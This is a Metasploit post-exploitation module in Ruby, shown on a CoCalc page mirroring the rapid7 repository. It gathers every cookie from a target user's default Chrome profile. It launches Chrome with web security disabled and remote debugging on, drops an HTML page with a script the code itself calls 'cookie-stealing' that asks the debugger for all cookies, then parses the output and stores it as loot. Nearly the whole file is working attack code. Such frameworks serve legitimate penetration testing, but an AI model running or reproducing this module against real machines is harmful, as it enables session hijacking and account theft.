Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/chrome_cookies.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Chrome Gather Cookies',

14
        'Description' => 'Read all cookies from the Default Chrome profile of the target user.',

15
        'License' => MSF_LICENSE,

16
        'Author' => ['mangopdf <mangodotpdf[at]gmail.com>'],

17
        'Platform' => %w[linux unix bsd osx windows],

18
        'SessionTypes' => %w[meterpreter shell],

19
        'Notes' => {

20
          'Stability' => [CRASH_SAFE],

21
          'SideEffects' => [],

22
          'Reliability' => []

23
        }

24
      )

25
    )

26


27
    register_options(

28
      [

29
        OptString.new('CHROME_BINARY_PATH', [false, "The path to the user's Chrome binary (leave blank to use the default for the OS)", '']),

30
        OptString.new('WRITEABLE_DIR', [false, 'Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\\Local\\Temp)', '']),

31
        OptInt.new('REMOTE_DEBUGGING_PORT', [false, 'Port on target machine to use for remote debugging protocol', 9222])

32
      ]

33
    )

34
  end

35


36
  def configure_for_platform

37
    vprint_status('Determining session platform')

38
    vprint_status("Platform: #{session.platform}")

39
    vprint_status("Type: #{session.type}")

40


41
    if session.platform == 'windows'

42
      username = get_env('USERNAME').strip

43
    else

44
      username = cmd_exec 'id -un'

45
    end

46


47
    temp_storage_dir = datastore['WRITABLE_DIR']

48


49
    case session.platform

50
    when 'unix', 'linux', 'bsd', 'python'

51
      chrome = 'google-chrome'

52
      user_data_dir = "/home/#{username}/.config/google-chrome"

53
      temp_storage_dir = temp_storage_dir.nil? ? '/tmp' : temp_storage_dir

54
      @cookie_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}"

55
    when 'osx'

56
      chrome = '"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"'

57
      user_data_dir = expand_path "/Users/#{username}/Library/Application Support/Google/Chrome"

58
      temp_storage_dir = temp_storage_dir.nil? ? '/tmp' : temp_storage_dir

59
      @cookie_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}"

60
    when 'windows'

61
      chrome = '"\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"'

62
      user_data_dir = "\\Users\\#{username}\\AppData\\Local\\Google\\Chrome\\User Data"

63
      temp_storage_dir = temp_storage_dir.nil? ? "\\Users\\#{username}\\AppData\\Local\\Temp" : temp_storage_dir

64
      @cookie_storage_path = "#{user_data_dir}\\chrome_debug.log"

65
    else

66
      fail_with Failure::NoTarget, "Unsupported platform: #{session.platform}"

67
    end

68


69
    unless datastore['CHROME_BINARY_PATH'].empty?

70
      chrome = datastore['CHROME_BINARY_PATH']

71
    end

72


73
=begin

74
    # #writable? not supported on windows

75
    unless writable? @temp_storage_dir

76
      fail_with Failure::BadConfig, "#{@temp_storage_dir} is not writable"

77
    end

78
=end

79


80
    @html_storage_path = create_cookie_stealing_html(temp_storage_dir)

81


82
    chrome_debugging_args = []

83


84
    if session.platform == 'windows'

85
      # `--headless` doesn't work on Windows, so use an offscreen window instead.

86
      chrome_debugging_args << '--window-position=0,0'

87
      chrome_debugging_args << '--enable-logging --v=1'

88
    else

89
      chrome_debugging_args << '--headless'

90
    end

91


92
    chrome_debugging_args_all_platforms = [

93
      '--disable-translate',

94
      '--disable-extensions',

95
      '--disable-background-networking',

96
      '--safebrowsing-disable-auto-update',

97
      '--disable-sync',

98
      '--metrics-recording-only',

99
      '--disable-default-apps',

100
      '--mute-audio',

101
      '--no-first-run',

102
      '--disable-web-security',

103
      '--disable-plugins',

104
      '--disable-gpu'

105
    ]

106


107
    chrome_debugging_args << chrome_debugging_args_all_platforms

108
    chrome_debugging_args << " --user-data-dir=\"#{user_data_dir}\""

109
    chrome_debugging_args << " --remote-debugging-port=#{datastore['REMOTE_DEBUGGING_PORT']}"

110
    chrome_debugging_args << " #{@html_storage_path}"

111


112
    @chrome_debugging_cmd = "#{chrome} #{chrome_debugging_args.join(' ')}"

113
  end

114


115
  def create_cookie_stealing_html(temp_storage_dir)

116
    cookie_stealing_html = %(

117
      <!DOCTYPE html>

118
      <html lang="en">

119
      <head>

120
        <meta charset="utf-8">

121
        <title>index.html</title>

122
      </head>

123
      <body>

124
          <script>

125


126
              var remoteDebuggingPort = #{datastore['REMOTE_DEBUGGING_PORT']};

127
              var request = new XMLHttpRequest();

128
              request.open("GET", "http://localhost:" + remoteDebuggingPort + "/json");

129
              request.responseType = 'json';

130
              request.send();

131


132
              request.onload = function() {

133
                var webSocketDebuggerUrl = request.response[0].webSocketDebuggerUrl;

134
                console.log(webSocketDebuggerUrl);

135
                var connection = new WebSocket(webSocketDebuggerUrl);

136


137
                connection.onopen = function () {

138
                  connection.send('{"id": 1, "method": "Network.getAllCookies"}');

139
                };

140


141
                connection.onmessage = function (e) {

142
                  var cookies_blob = JSON.stringify(JSON.parse(e.data).result.cookies);

143
                  console.log('REMOTE_DEBUGGING|' + cookies_blob);

144
                };

145
              }

146
          </script>

147
      </body>

148
      </html>

149
    )

150


151
    # Where to temporarily store the cookie-stealing html

152
    if session.platform == 'windows'

153
      html_storage_path = "#{temp_storage_dir}\\#{Rex::Text.rand_text_alphanumeric(10..15)}.html"

154
    else

155
      html_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}.html"

156
    end

157


158
    write_file(html_storage_path, cookie_stealing_html)

159
    html_storage_path

160
  end

161


162
  def cleanup

163
    if file?(@html_storage_path)

164
      vprint_status("Removing file #{@html_storage_path}")

165
      rm_f @html_storage_path

166
    end

167


168
    if file?(@cookie_storage_path)

169
      vprint_status("Removing file #{@cookie_storage_path}")

170
      rm_f @cookie_storage_path

171
    end

172
  end

173


174
  def get_cookies

175
    if session.platform == 'windows'

176
      chrome_cmd = @chrome_debugging_cmd.to_s

177
      kill_cmd = 'taskkill /f /pid'

178
    else

179
      chrome_cmd = "#{@chrome_debugging_cmd} > #{@cookie_storage_path} 2>&1"

180
      kill_cmd = 'kill -9'

181
    end

182


183
    if session.type == 'meterpreter'

184
      chrome_pid = cmd_exec_get_pid(chrome_cmd)

185
      print_status "Activated Chrome's Remote Debugging (pid: #{chrome_pid}) via #{chrome_cmd}"

186
      Rex.sleep(5)

187


188
      # read_file within if/else block because kill was terminating sessions on OSX during testing

189
      chrome_output = read_file(@cookie_storage_path)

190


191
      # Kills spawned chrome process in windows meterpreter sessions.

192
      # In OSX and Linux the meterpreter sessions would stop as well.

193
      if session.platform == 'windows'

194
        cmd_exec "#{kill_cmd} #{chrome_pid}"

195
      end

196
    else

197
      # Using shell_command for backgrounding process (&)

198
      client.shell_command("#{chrome_cmd} &")

199
      print_status "Activated Chrome's Remote Debugging via #{chrome_cmd}"

200
      Rex.sleep(5)

201


202
      chrome_output = read_file(@cookie_storage_path)

203
    end

204


205
    cookies_msg = ''

206
    chrome_output.each_line do |line|

207
      if line =~ /REMOTE_DEBUGGING/

208
        print_good('Found Match')

209
        cookies_msg = line

210
      end

211
    end

212


213
    fail_with(Failure::Unknown, 'Failed to retrieve cookie data') if cookies_msg.empty?

214


215
    # Slice off the "REMOTE_DEBUGGING|" delimiter and trailing source info

216
    cookies_json = cookies_msg.split('REMOTE_DEBUGGING|')[1]

217
    cookies_json.split('", source: file')[0]

218
  end

219


220
  def save(msg, data, ctype = 'text/json')

221
    ltype = 'chrome.gather.cookies'

222
    loot = store_loot ltype, ctype, session, data, nil, msg

223
    print_good "#{msg} stored in #{loot}"

224
  end

225


226
  def run

227
    fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?

228


229
    # Issues with write_file. Maybe a path problem?

230
    if session.platform == 'windows' && session.type == 'shell'

231
      fail_with Failure::BadConfig, 'Windows shell session not support, giving up'

232
    end

233


234
    unless session.platform == 'windows' && session.type == 'meterpreter'

235
      print_warning 'This module will leave a headless Chrome process running on the target machine.'

236
    end

237


238
    configure_for_platform

239
    cookies = get_cookies

240
    cookies_parsed = JSON.parse cookies

241
    save "#{cookies_parsed.length} Chrome Cookies", cookies

242
  end

243
end

244


245